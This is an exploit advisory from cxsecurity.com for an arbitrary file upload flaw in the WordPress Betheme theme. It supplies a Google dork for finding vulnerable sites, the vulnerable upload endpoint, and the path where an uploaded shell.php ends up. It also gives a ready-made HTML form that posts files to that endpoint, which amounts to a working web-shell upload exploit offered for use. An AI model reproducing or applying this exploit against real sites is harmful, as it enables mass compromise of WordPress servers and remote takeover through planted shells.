Wordpress Themes betheme Sh3ll Upload Vulnerability | CSRF

2017.03.28
ir Turk@Xtra (IR) ir
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/wp-content/themes/betheme/

################################################################################# # Wordpress Themes betheme Sh3ll Upload Vulnerability | CSRF # Author : Turk@Xtra # Google Dork: inurl:/wp-content/themes/betheme/ # Date:2017-03-13 # Tested on: Win 7, Linux ################################################################################# # [!] Exploit : http://127.0.0.1/wp-content/themes/betheme/muffin-options/fields/upload/field_upload.php # [!] File Location : http://127.0.0.1//wp-content/themes/betheme/muffin-options/fields/upload/Files/shell.php ################################################################################# #[*] CSRF: ################################################################################# <html> <body> <form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/betheme/muffin-options/fields/upload/field_upload.php" method="post"> Your File: <input name="files[]" type="file" /><br /> <input type="submit" value="SIKAT!" /> </form> </body> </html> ################################################################################# # Thanks to : ~~> Blackwolf ||Ormazd ||Khatar ||mohammad Pn ||Criminal ||Rabinson. # Iranian Anonymous # Discovered By: Saman.Khan


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top